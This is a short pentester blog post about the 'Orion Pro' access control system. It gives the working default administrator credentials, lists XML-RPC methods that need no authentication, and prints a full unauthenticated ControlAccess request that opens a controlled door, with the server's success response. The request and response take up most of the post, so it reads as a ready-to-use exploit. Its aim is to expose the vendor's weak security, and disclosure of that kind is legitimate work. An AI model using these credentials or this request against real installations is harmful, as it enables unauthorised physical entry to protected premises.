Short story about «Orion Pro»: access control system without access control

Once whule pentesting a WI-FI network I discovered a lot of open ports (XML-RPC) on one of the hosts.

The server kindly answered to the garbage I had send:

BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

A bit of googling and I find out that that was an access control system АРМ «Орион Про» of the security company ЗАО НВП «Болид».

After reading the documentation I tried to use the ADMINISTRATOR:ORION as credentials. That was successful. I could manage the system as I wanted to. But this story is not about that.

What if there was a strong password?

In that case you would be able to use the XML-RPC methods that do not require authentication. There are plenty of them, e.g. GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync, ControlAccess, etc.

If you wanted you could open the door controlled by that “security system” via the request:

GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467

<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
  <methodName>ControlAccess</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>ComPort</name>
            <value>
              <int>3</int>
            </value>
          </member>
          <member>
            <name>PKUAddress</name>
            <value>
              <int>0</int>
            </value>
          </member>
          <member>
            <name>DeviceAddress</name>
            <value>
              <int>5</int>
            </value>
          </member>
          <member>
            <name>AggregateAddress</name>
            <value>
              <int>1</int>
            </value>
          </member>
          <member>
            <name>Command</name>
            <value>
              <int>7</int>
            </value>
          </member>
          <member>
            <name>MethodNameForAnswer</name>
            <value>
              <string>Result</string>
            </value>
          </member>
          <member>
            <name>IPSERVER</name>
            <value>
              <string>y.y.y.y</string>
            </value>
          </member>
          <member>
            <name>PORTSERVER</name>
            <value>
              <int>7777</int>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Viola!

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server:  BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
   <params>
   <param>
<value>
  <struct>
    <member>
      <name>Result</name>
      <value><boolean>1</boolean></value>
    </member>
  </struct>
</value>
   </param>
   </params>
</methodResponse>

The company that makes the access control systems seems to be not bothered about access control whatsoever.